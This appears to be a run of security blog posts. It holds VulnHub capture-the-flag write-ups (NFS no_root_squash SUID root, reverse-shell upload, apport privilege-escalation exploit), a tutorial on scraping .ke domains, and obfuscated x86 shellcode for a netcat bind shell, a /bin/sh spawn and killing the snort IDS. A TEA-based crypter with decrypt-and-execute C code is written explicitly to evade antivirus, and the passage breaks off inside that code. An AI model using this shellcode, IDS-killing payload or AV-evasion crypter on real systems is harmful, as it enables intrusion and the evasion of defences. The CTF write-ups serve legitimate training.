	www-data@Orcus:/var/www$ ls
	ls
	9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
	a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
	b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
	flag.txt
	html
	zenphoto-zenphoto-1.4.10
	www-data@Orcus:/var/www$ cd html
	cd html
	www-data@Orcus:/var/www/html$ ls
	ls
	ls: cannot open directory '.': Permission denied
	www-data@Orcus:/var/www$ cat flag.txt
	cat flag.txt
	868c889965b7ada547fae81f922e45c4
	www-data@Orcus:/var/www$

view raw orcus: limited_shell hosted with ❤ by GitHub

With the first flag in the bag let try and root on this box. It took me a while to root this box. I kept going away trying privilege escalation exploits. Until today morning I came back to my nmap scans and found this

2049/tcp open  nfs_acl     2-3 (RPC #100227)

wonder why that didn't stick out to me in the first place. I quickly run showmount.

root@kali:/tmp# showmount -e 172.16.94.136
Export list for 172.16.94.136:
/tmp *

I then checked /etc/exports file and found that the NFS shares were configured with no_root_squash

www-data@Orcus:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#        to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash) 

On our kali box, we mount the partition

root@kali:~# rm -rf /mnt/orcus/
root@kali:~# mkdir /mnt/orcus
root@kali:~# mount -t nfs -o proto=tcp,port=2049 172.16.94.136:/tmp /mnt/orcus
root@kali:~# touch /mnt/orcus/rooter
root@kali:~# chmod 777 /mnt/orcus/rooter

On our limited shell on Orcus we copy our bash shell into our newly created world writable /tmp/rooter

www-data@Orcus:/$ cp /bin/bash /tmp/rooter

we head back to our Kali box and set the seguid bit on the /tmp/rooter file (shell)

root@kali:~# chmod 4777 /mnt/orcus/rooter

we head into the the /tmp folder and check to make sure the the bit has been set and then execute the rooter with the -p option in order to preserve the previleges which gets us root privileges. :-)

	www-data@Orcus:/$ ls -al
	total 1124
	drwxrwxrwt 10 root root 4096 Mar 27 08:45 .
	drwxr-xr-x 24 root root 4096 Oct 30 23:05 ..
	drwxrwxrwt 2 root root 4096 Mar 27 08:36 .ICE-unix
	drwxrwxrwt 2 root root 4096 Mar 27 08:36 .Test-unix
	drwxrwxrwt 2 root root 4096 Mar 27 08:36 .X11-unix
	drwxrwxrwt 2 root root 4096 Mar 27 08:36 .XIM-unix
	drwxrwxrwt 2 root root 4096 Mar 27 08:36 .font-unix
	-rwsrwxrwx 1 root root 1109564 Mar 27 08:50 rooter
	drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-dovecot.service-YyhShT
	drwx------ 3 root root 4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-systemd-timesyncd.service-ENaVWk
	drwx------ 2 root root 4096 Mar 27 08:36 vmware-root
	www-data@Orcus:/$ ./rooter -p
	id
	uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
	cd /root
	ls
	flag.txt
	cat flag.txt
	807307b49314f822985d0410de7d8bfe

view raw orcus:rooting hosted with ❤ by GitHub

It was a great challenge that emphasized the importance of an organized approach as opposed to a randomized one. Thanks to Viper for the awesome challenge and ofcourse g0tmi1k and the whole vulnhub community who keep the war games coming.

Solving hackfest2016: Sedna VM

First scanned the box.

	root@kali:/tmp# nmap -sT -A -P0 172.16.94.135
	Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 14:29 EDT
	Nmap scan report for 172.16.94.135
	Host is up (0.00055s latency).
	Not shown: 989 closed ports
	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
	| ssh-hostkey:
	| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
	| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
	|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
	53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
	| dns-nsid:
	|_ bind.version: 9.9.5-3-Ubuntu
	80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
	| http-robots.txt: 1 disallowed entry
	|_Hackers
	|_http-server-header: Apache/2.4.7 (Ubuntu)
	|_http-title: Site doesn't have a title (text/html).
	110/tcp open pop3?
	111/tcp open rpcbind 2-4 (RPC #100000)
	| rpcinfo:
	| program version port/proto service
	| 100000 2,3,4 111/tcp rpcbind
	| 100000 2,3,4 111/udp rpcbind
	| 100024 1 38660/udp status
	|_ 100024 1 46739/tcp status
	139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
	143/tcp open imap Dovecot imapd
	|_imap-capabilities: CAPABILITY
	445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
	993/tcp open ssl/imap Dovecot imapd
	| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
	| Not valid before: 2016-10-07T19:17:14
	|_Not valid after: 2026-10-07T19:17:14
	|_ssl-date: TLS randomness does not represent time
	995/tcp open ssl/pop3s?
	| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
	| Not valid before: 2016-10-07T19:17:14
	|_Not valid after: 2026-10-07T19:17:14
	|_ssl-date: ERROR: Script execution failed (use -d to debug)
	8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
	| http-methods:
	|_ Potentially risky methods: PUT DELETE
	|_http-open-proxy: Proxy might be redirecting requests
	|_http-server-header: Apache-Coyote/1.1
	|_http-title: Apache Tomcat
	MAC Address: 00:0C:29:68:AD:36 (VMware)
	Device type: general purpose
	Running: Linux 3.X|4.X
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.2 - 4.6
	Network Distance: 1 hop
	Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
	Host script results:
	|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
	| smb-os-discovery:
	| OS: Unix (Samba 4.1.6-Ubuntu)
	| NetBIOS computer name: SEDNA\x00
	| Workgroup: WORKGROUP\x00
	|_ System time: 2017-03-17T14:31:40-04:00
	| smb-security-mode:
	| account_used: guest
	| authentication_level: user
	| challenge_response: supported
	|_ message_signing: disabled (dangerous, but default)
	|_smbv2-enabled: Server supports SMBv2 protocol
	TRACEROUTE
	HOP RTT ADDRESS
	1 0.55 ms 172.16.94.135
	OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 148.99 seconds
	root@kali:~# us -mT -Iv 172.16.94.135:a -r 3000 -R 3 && us -mU -Iv 172.16.94.135:a -r 3000 -R 3
	adding 172.16.94.135/32 mode `TCPscan' ports `a' pps 3000
	using interface(s) eth0
	scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
	TCP open 172.16.94.135:22 ttl 64
	TCP open 172.16.94.135:995 ttl 64
	TCP open 172.16.94.135:111 ttl 64
	TCP open 172.16.94.135:8080 ttl 64
	TCP open 172.16.94.135:139 ttl 64
	TCP open 172.16.94.135:110 ttl 64
	TCP open 172.16.94.135:53 ttl 64
	TCP open 172.16.94.135:993 ttl 64
	TCP open 172.16.94.135:445 ttl 64
	TCP open 172.16.94.135:143 ttl 64
	TCP open 172.16.94.135:50201 ttl 64
	TCP open 172.16.94.135:80 ttl 64
	sender statistics 1908.1 pps with 196608 packets sent total
	listener statistics 409090 packets recieved 0 packets droped and 0 interface drops
	TCP open ssh[ 22] from 172.16.94.135 ttl 64
	TCP open domain[ 53] from 172.16.94.135 ttl 64
	TCP open http[ 80] from 172.16.94.135 ttl 64
	TCP open pop3[ 110] from 172.16.94.135 ttl 64
	TCP open sunrpc[ 111] from 172.16.94.135 ttl 64
	TCP open netbios-ssn[ 139] from 172.16.94.135 ttl 64
	TCP open imap[ 143] from 172.16.94.135 ttl 64
	TCP open microsoft-ds[ 445] from 172.16.94.135 ttl 64
	TCP open imaps[ 993] from 172.16.94.135 ttl 64
	TCP open pop3s[ 995] from 172.16.94.135 ttl 64
	TCP open http-alt[ 8080] from 172.16.94.135 ttl 64
	TCP open unknown[50201] from 172.16.94.135 ttl 64
	adding 172.16.94.135/32 mode `UDPscan' ports `a' pps 3000
	using interface(s) eth0
	scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds
	UDP open 172.16.94.135:53 ttl 64
	UDP open 172.16.94.135:111 ttl 64
	UDP open 172.16.94.135:137 ttl 64
	UDP open 172.16.94.135:5353 ttl 255
	sender statistics 1732.9 pps with 196635 packets sent total
	listener statistics 36 packets recieved 0 packets droped and 0 interface drops
	UDP open domain[ 53] from 172.16.94.135 ttl 64
	UDP open sunrpc[ 111] from 172.16.94.135 ttl 64
	UDP open netbios-ns[ 137] from 172.16.94.135 ttl 64
	UDP open mdns[ 5353] from 172.16.94.135 ttl 255

view raw nmap hosted with ❤ by GitHub

	root@kali:/tmp# nikto -h http://172.16.94.135
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP: 172.16.94.135
	+ Target Hostname: 172.16.94.135
	+ Target Port: 80
	+ Start Time: 2017-03-17 14:37:57 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Apache/2.4.7 (Ubuntu)
	+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ "robots.txt" contains 1 entry which should be manually viewed.
	+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
	+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
	+ OSVDB-3268: /files/: Directory indexing found.
	+ OSVDB-3092: /files/: This might be interesting...
	+ OSVDB-3092: /system/: This might be interesting...
	+ OSVDB-3233: /icons/README: Apache default file found.
	+ OSVDB-3092: /license.txt: License file found may identify site software.
	+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
	+ End Time: 2017-03-17 14:38:32 (GMT-4) (35 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested
	root@kali:/tmp# nikto -h http://172.16.94.135:8080
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP: 172.16.94.135
	+ Target Hostname: 172.16.94.135
	+ Target Port: 8080
	+ Start Time: 2017-03-17 14:39:49 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Apache-Coyote/1.1
	+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
	+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
	+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
	+ /: Appears to be a default Apache Tomcat install.
	+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
	+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
	+ /manager/html: Default Tomcat Manager / Host Manager interface found
	+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
	+ /manager/status: Default Tomcat Server Status interface found
	+ 7839 requests: 0 error(s) and 13 item(s) reported on remote host
	+ End Time: 2017-03-17 14:40:30 (GMT-4) (41 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

view raw nikto hosted with ❤ by GitHub

As I was clicking around i found this. http://172.16.94.135/files/be_demo/blog/categories/newlogo.jpg

With this I searched exploit-db and found this. I first tried to upload directly using the firefox plugin Poster but the uploads kept getting renamed and php extension were being filtered somehow.

So i decided to try and upload the exploit first then use it to upload the php-reverse-shell. This got me a limited shell on the system.

	root@kali:/tmp# nc -lvp 443
	listening on [any] 443 ...
	172.16.94.135: inverse host lookup failed: Unknown host
	connect to [172.16.94.130] from (UNKNOWN) [172.16.94.135] 58774
	Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
	14:57:01 up 2 days, 20 min, 0 users, load average: 0.00, 0.03, 0.05
	USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	/bin/sh: 0: can't access tty; job control turned off
	$ id
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	$ uname -a
	Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
	www-data@Sedna:/var/www$ cat flag.txt
	cat flag.txt
	bfbb7e6e6e88d9ae66848b9aeac6b289
	www-data@Sedna:/var/www$

view raw rev_shell hosted with ❤ by GitHub

For privilege escalation I used taviso's exploit [CVE-2015-1318 newpid (apport)] The link to the exploit can be found here.

	www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid
	gcc newpid.c -o newpid
	newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
	# warning this file must be compiled with -static
	^
	www-data@Sedna:/tmp/sploits/expl$ ./newpid
	./newpid
	newpid: you *must* compile with -static
	www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid -static
	gcc newpid.c -o newpid -static
	newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
	# warning this file must be compiled with -static
	^
	www-data@Sedna:/tmp/sploits/expl$ ./newpid
	./newpid
	uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
	# id
	id
	uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
	# pwd
	pwd
	/tmp/sploits/expl
	# cd /root
	cd /root
	# ls
	ls
	8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip chkrootkit flag.txt
	# cat flag.txt
	cat flag.txt
	a10828bee17db751de4b936614558305
	#

view raw rooting hosted with ❤ by GitHub

Thanks to Viper for the awesome challenge and ofcourse g0tmi1k and the whole vulnhub community who keep the war games coming.

How to gather domains belonging to a Top Level Domain (TLD)

I was recently looking for a list of all domains belonging to a country, i tried the usual methods of googling for lists and came up empty. The sites that i found that claimed to have such lists were asking for money.....and you know how that usually goes. So i took it upon myself to scrape the Internet and find as many domains belonging to a country as possible. If anyone has a more elegant way of getting these kinds of lists without that doesn't include paying money, I'm all ears.  For example if you wanted to find the domains the belong to a country like Uganda, you'd have to find as many ug domains as possible or if you're a German, find as many .de sites as possible. For this exercise I didn't bother including the .com .net domains and the like for obvious reasons. I have picked Kenya (.ke) as  the country of interest. Without further ado lets dive in, but before we start, certain assumptions have to be made:
1.    All sites ending with .ke belong to Kenya
2.    All the domains are in 3 parts in the format for example ku.ac.ke
3.    We don't have any money to use the paid services (not really an assumption :-))

My first order of business was to collect the top visited sites belonging to that country on Alexa. Alexa lists the top 500 sites visited by each country. What better way to start finding domains by going to a site that has done part of the work for you. With this i quickly fired up python and wrote a simple script that would give us a nice list of the domains in a well listed format. I leveraged the adept beautiful Soup library which has amazing capabilities when it comes to scraping web pages.

	#!/usr/bin/python
	text_file = open("top500kenyansites.txt", "w")
	for i in range(0,20):
	req = urllib2.Request('http://www.alexa.com/topsites/countries;%s/KE' %i, headers={ 'User-Agent': 'Mozilla/5.0' })
	httpResponse = urllib2.urlopen(req)
	if httpResponse.code == 200 :
	html = httpResponse.read()
	bs = BeautifulSoup(html,"lxml")
	sites = bs.find_all('div', {"class":"desc-container"})
	for site in sites:
	web = site.find('a')
	print web.text
	text_file.write(web.text + "\n")
	else :
	print "[-] There was an error in downloading the page\n"
	text_file.close()

view raw topKEwebsites.py hosted with ❤ by GitHub

Disclaimer: Any change in the structure of the webpage will break the scraper so probably by the time you read this post and Alexa has changed its websites' structure, the scraper will seize to work as expected.

Run the above script.

roman@ubuntu /tmp $ python topKEwebsites.py 

This gives us a nice list like the one below. (I've trimmed it for brevity)

	Google.com
	Youtube.com
	Facebook.com
	Standardmedia.co.ke
	Nation.co.ke
	Yahoo.com
	The-star.co.ke
	Sportpesa.com
	Google.co.ke
	Twitter.com
	.
	.
	.
	Cutewriters.com
	Worldcat.org
	Fao.org
	Thesportbible.com
	Nic-bank.com
	Betradar.com
	Shareasale.com
	Fuzu.com
	Samsung.com
	Youtube-mp3.org

view raw txt hosted with ❤ by GitHub

We'll check our top500kenyansites.txt list to make sure the sites are 500.

cat top500kenyansites.txt | wc -l
500 

With this, we'll use bash to get only those ending with .ke. The below bash line should suffice. This leaves us with 66 domains.

roman@ubuntu /tmp $ cat top500kenyansites.txt | grep '.ke$' > alexalist.txt
roman@ubuntu /tmp $ cat alexalist.txt | wc -l
66

Next we're going to scrape google to find as many .ke domains as possible. For this post I'll do only google but if you want to be more thorough in your results you can leverage other search engines as well. The concepts are the same as when you use google.

For this next step there are a number of ways of achieving this; you could use the google API but its heavily limiting in terms of the number of results we'll get back. When i tried it i think i was limited to 10 results which is hardly helpful since we're trying to get all the domains google has indexed for our TLD in question. We could also pay for services like import[.]io but that goes against one of the targets of this post (not spending money in the process of getting our list). Another way would be to scrape the google results pages as i first did when i attempted this exercise but that is now a dead end as well since what will be returned by HTTP request is meant for browsers to render and beautiful soup doesn't render data so we'll probably end up with empty container which are later filled in dynamically as a page renders. Google probably did it to thwart attempts like this one. I finally decided on the method used by Chris Ains. With his method you need to have the chrome browser since he wrote a bookmark-let to get all the URLs from a particular search. Follow the steps listed in the link below.

http://www.chrisains.com/seo-tools/extract-urls-from-web-serps/

Once your browser is all set, we'll use the google search operand "site:.ke". This should give us the as the in the screen-shot below.

 



From this we can see the various sub domains for the .ke TLD ie .go.ke,.ac.ke,.or.ke,.me.ke. We'll repeat the searches for the other sub-domains that we have found. Don't forget to scroll to the end each of the search results before clicking the bookmark-let as stated in Chris' steps.

 



Go to the results processed by the bookmark-let and scroll to the URL list section. Copy all the URLs for all the results got from the various sub-domain searched and put them in a text file.

roman@ubuntu /tmp $ cat kenyaURLs.txt | wc -l
3249

This gave me about 3249 URLs. The next plan is to extract the domain names from all the URLs.
We'll first remove the duplicates and the extra unwanted http stuff and links. This leaves us with about 1216 domains.

roman@ubuntu /tmp $ cat kenyaURLs.txt | cut -d"/" -f 3 | sort -u > uniqueDomains.txt
roman@ubuntu /tmp $ cat uniqueDomains.txt | wc -l
1216
roman@ubuntu /tmp $ cat uniqueDomains.txt | head
aasciences.ac.ke
abdalla.me.ke
about.me.ke
academics.uonbi.ac.ke
accommodation.ku.ac.ke
account.ecitizen.go.ke
acorce.nca.go.ke
actuarieskenya.or.ke
adc.or.ke
adis.uonbi.ac.ke

roman@ubuntu ~/playing_folder/KENYA $ cat kenyaURLs.txt | wc -l
3249

This gave me about 3249 URLs. The next plan is to extract the domain names from all the URLs.
We'll first remove the duplicates and the extra unwanted http stuff and links. This leaves us with about 1216 domains.

roman@ubuntu /tmp $ cat kenyaURLs.txt | cut -d"/" -f 3 | sort -u > uniqueDomains.txt
roman@ubuntu /tmp $ cat uniqueDomains.txt | wc -l
1216

roman@ubuntu /tmp $ cat uniqueDomains.txt | head
aasciences.ac.ke
abdalla.me.ke
about.me.ke
academics.uonbi.ac.ke
accommodation.ku.ac.ke
account.ecitizen.go.ke
acorce.nca.go.ke
actuarieskenya.or.ke
adc.or.ke
adis.uonbi.ac.ke

We quickly run into a problem for example academics.uonbi.ac.ke and adis.uonbi.ac.ke both belong to the same domain but are listed as separate in our list.

roman@ubuntu /tmp $ sed -e 's/./\L&/' alexalist.txt >> uniqueDomains.txt 
roman@ubuntu /tmp $ cat uniqueDomains.txt | wc -l
1282
roman@ubuntu /tmp $ cat uniqueDomains.txt | sort -u | wc -l
1278
roman@ubuntu /tmp $ cat uniqueDomains.txt | sort -u > unifiedlist.txt
roman@ubuntu /tmp $ cat unifiedlist.txt | wc -l
1278
roman@ubuntu /tmp $ sed 's/^\( *\).*\.\(.*\..*\.\)/\1\2/' unifiedlist.txt | sort -u > FINAL.txt
roman@ubuntu /tmp $ cat FINAL.txt | wc -l
958

In the above snippets what I've done is append our first list (the one that we got from Alexa) to our uniqueDomains.txt list. I first changed the case of all the first characters to lower since they were all uppercase, during the sorting, bash would have treated them differently.
I then went ahead and sorted them so that the duplicated were removed and then in the final esoteric sed command usage, I basically removed all the sub-domains (remember our academics.uonbi.ac.ke and adis.uonbi.ac.ke problem?) Well this snippet seeks to solve that problem. So we end up with a nice list of 958 unique .ke domains. You can find the list of the domains as well as the code snippets on my github.

Manual Shellcode Obfuscation

This post shows some techniques used in shellcode obfuscation. The shellcodes were got from shell-strorm.org.

	;Shellcode obfuscation
	;http://shell-storm.org/shellcode/files/shellcode-804.php
	;linux x86 nc -lvve/bin/sh -p13377 shellcode
	;This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
	;Author: evil_comrade
	section .text
	global _start
	_start:
	xor ebx,ebx ;Clear ebx register
	imul ebx ;Clear all other registers
	mov ebp, esp ;save stack pointer into ebp we'll refer to it later
	mov edx, 0x556262CC ;Load 0x556262CC into edx reason will become clear soon
	mov ebx, 0x555555FF ;Load 0x555555FF into ebx register
	xor edx, ebx ;Xoring the above two values gives us 373733 (377)
	push edx ;push the result onto the stack
	xor ebx, 0x666425d2 ;xor the value in ebx with a number that will give us 0x3331702d
	push ebx ;push 0x3331702d(-p13) onto the stack
	mov edx, esp ;save stack pointer into edx
	push eax
	mov ecx, 0x89765432 ;move arbitrary value into ecx
	mov ebx, 0x891e271d ;move a no. in ebx which if xored with arbitrary no. returns (68732F)
	xor ebx, ecx ;xor the numbers
	push ebx ;push the result onto the stack (/sh)
	xor ecx, 0xE71F361D ;xor the value in ebx with a number that will give us 6E69622F
	push ecx ;push the result onto the stack (/bin)
	mov ebx, 0xb7fc2ff4 ;load arbitrary number into ebx
	xor ebx, 0xd28a43d9 ;xor in with a number that will give us 0x65766c2d (-lve)
	push ebx ;push 0x65766c2d onto the stack
	mov ecx,esp ;save stack pointer into ecx
	push eax
	push 0xff636e2f ;push 0xff636e2f (we need only the 636e2f) /nc
	mov [ebp-29], al ;since al has 0 at this pointer we replace the 0xff with it
	mov ebx, 0xb7fc2ff4 ;load random value into ebx
	xor ebx, 0xD9954DDB ;load value which if xored with ebx returns 0x6e69622f
	push ebx ;push 0x6e69622f (/bin)
	mov ebx, esp ;save stack pointer into ebx
	push eax ;rest of the caode basically loads the parameters
	push edx
	push ecx
	push ebx
	cdq
	mov ecx,esp
	mov al, 0xb ;call execve
	int 0x80

view raw shellcode-804.nasm hosted with ❤ by GitHub

	;Shellcode obfuscation
	;http://shell-storm.org/shellcode/files/shellcode-863.php
	;shellcode spawns a /bin/sh shell
	;leverages a getpc technique
	;Author: evil_comrade
	;
	global _start
	section .text
	_start:
	fldz
	jmp short call_shellcode
	message: db 0xeb,0x25,0x5e,0x89,0xf7,0x31,0xc0,0x50,0x89,0xe2,0x50,0x83,0xc4,0x03,0x8d,0x76,0x04,0x33,0x06,0x50,0x31,0xc0,0x33,0x07,0x50,0x89,0xe3,0x31,0xc0,0x50,0x8d,0x3b,0x57,0x89,0xe1,0xb0,0x0b,0xcd,0x80,0xe8,0xd6,0xff,0xff,0xff,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
	call_shellcode:
	fstenv [esp-0xc]
	pop ebp
	lea eax, [ebp+4]
	jmp eax

view raw shellcode-863.nasm hosted with ❤ by GitHub

	;Shellcode obfuscation
	;original link http://shell-storm.org/shellcode/files/shellcode-741.php
	;Author: evil_comrade
	;/usr/bin/killall snort
	;
	global _start
	section .text
	_start:
	xor ebx,ebx ;Clear ebx register
	imul ebx ;Clear all other registers
	mov ebx, eax
	mov dword [esp-4], ebx
	sub esp, 4
	test eax, eax
	push 0x74
	mov edx, 0x615E5D62
	add edx, 0x11111111
	push edx ;push 0x726f6e73
	mov esi, esp
	push eax
	push dword 0x6c6c616c
	test eax, eax
	push dword 0x6c696b2f
	test ebx, ebx
	push dword 0x6e69622f
	push dword 0x7273752f
	mov ebx,esp
	push eax
	push esi
	push ebx
	mov ecx, esp
	cdq
	mov al, 0xa
	inc eax
	int 0x80

view raw shellcode-741.nasm hosted with ❤ by GitHub

Tiny Encryption Algorithm Crypter

I chose to use Tiny Encryption Algorithm for writing my crypter because its small and its compilation doesn’t require importing any other libraries. Its also kind to the processor during the key decryption process (remember the point is to simple evade AV) so the encryption doesn’t have to be the strongest in the world. To find out more about crypters and their implementations you can check out this paper. Now onto the implementation of my crypter.
The reference code is from wikipedia. I implemented it in c to leverage the languages' speed. I used the basic /bin/sh shell-code to test the crypter. I tested it on an Ubuntu system.

	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#include <string.h>
	void encrypt (uint32_t* v, uint32_t* k);
	void decrypt (uint32_t* v, uint32_t* k);
	void encryptBlock(uint8_t * data, uint32_t * len, uint32_t * key);
	void decryptBlock(uint8_t * data, uint32_t * len, uint32_t * key);
	uint32_t TEAKey[4] = {0x68697071, 0x65646172, 0x6d6f635f, 0x6c697665};
	uint8_t shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
	int main()
	{
	uint32_t* len;
	uint32_t shellcode_len = 0;
	uint32_t counter = 0;
	shellcode_len = strlen(shellcode);
	len = &shellcode_len;
	encryptBlock(shellcode, len, TEAKey);
	puts("\nEncrypted:");
	for(counter = 0; counter < shellcode_len; counter++)
	printf("\\x%02x", shellcode[counter]);
	printf("\nLength: %d\n", shellcode_len);
	return 0;
	}
	void encryptBlock(uint8_t * data, uint32_t * len, uint32_t * key)
	{
	uint32_t blocks, i;
	uint32_t * data32;
	// treat the data as 32 bit unsigned integers
	data32 = (uint32_t *) data;
	// Find the number of 8 byte blocks, add one for the length
	blocks = (((*len) + 7) / 8) + 1;
	// Set the last block to the original data length
	data32[(blocks*2) - 1] = *len;
	// Set the encrypted data length
	*len = blocks * 8;
	for(i = 0; i< blocks; i++)
	{
	encrypt(&data32[i*2], key);
	}
	}
	void encrypt (uint32_t* v, uint32_t* k) {
	uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */
	uint32_t delta=0x9e3779b9; /* a key schedule constant */
	uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
	for (i=0; i < 32; i++) { /* basic cycle start */
	sum += delta;
	v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
	v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
	} /* end cycle */
	v[0]=v0; v[1]=v1;
	}

view raw tea.c hosted with ❤ by GitHub

We copy the shellcode we want to deploy into the shellcode field as shown above. You can change the key to whatever value you want to provided you retain the format. Next we compile the code in the c file "gcc TEA.c -o TEA" and then run it "./TEA". This will give us the crypted /bin/sh shellcode.  You should get get output like this.

 
roman@ubuntu:~/SLAE/Shellcode/Crypter$ ./TEA

Encrypted:
\x89\x45\x8b\x36\x8a\xc9\x8b\x48\xd6\xb2\x9a\x53\xc8\x59\x18\xd4\x46\x26\x6e\xbf\x33
\xdc\x20\x5d\x46\x01\x38\x7c\x4d\x3e\x23\xf1\xa3\xaa\xbf\x73\x46\xdb\xcc\xcd
Length: 40

We then paste the above shell-code into another c program which will execute the shellcode. Make sure the key you use in this program (lets call it TEAExecuteshellcode.c) is the same as the one you used in TEA.c So what this program basically does is run the decryption algorithm on the shellcode and then executes it.

	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#include <string.h>
	void decrypt (uint32_t* v, uint32_t* k);
	void decryptBlock(uint8_t * data, uint32_t * len, uint32_t * key);
	uint32_t TEAKey[4] = {0x68697071, 0x65646172, 0x6d6f635f, 0x6c697665};
	uint8_t shellcode[] = "\x89\x45\x8b\x36\x8a\xc9\x8b\x48\xd6\xb2\x9a\x53\xc8\x59\x18\xd4\x46\x26\x6e\xbf\x33\xdc\x20\x5d\x46\x01\x38\x7c\x4d\x3e\x23\xf1\xa3\xaa\xbf\x73\x46\xdb\xcc\xcd";
	int main()
	{
	uint32_t* len;
	uint32_t shellcode_len = 0;
	uint32_t counter = 0;
	shellcode_len = strlen(shellcode);
	len = &shellcode_len;
	decryptBlock(shellcode, len, TEAKey);
	puts("\nDecrypting and running Shellcode:");
	int (*ret)() = (int(*)())shellcode;
	ret();
	}
	void decryptBlock(uint8_t * data, uint32_t * len, uint32_t * key)
	{
	uint32_t blocks, i;
	uint32_t * data32;
	// treat the data as 32 bit unsigned integers
	data32 = (uint32_t *) data;
	// Find the number of 8 byte blocks
	blocks = (*len)/8;
	for(i = 0; i< blocks; i++)
	{
	decrypt(&data32[i*2], key);
	}
	// Return the length of the original data
	*len = data32[(blocks*2) - 1];
	}
	void decrypt (uint32_t* v, uint32_t* k) {
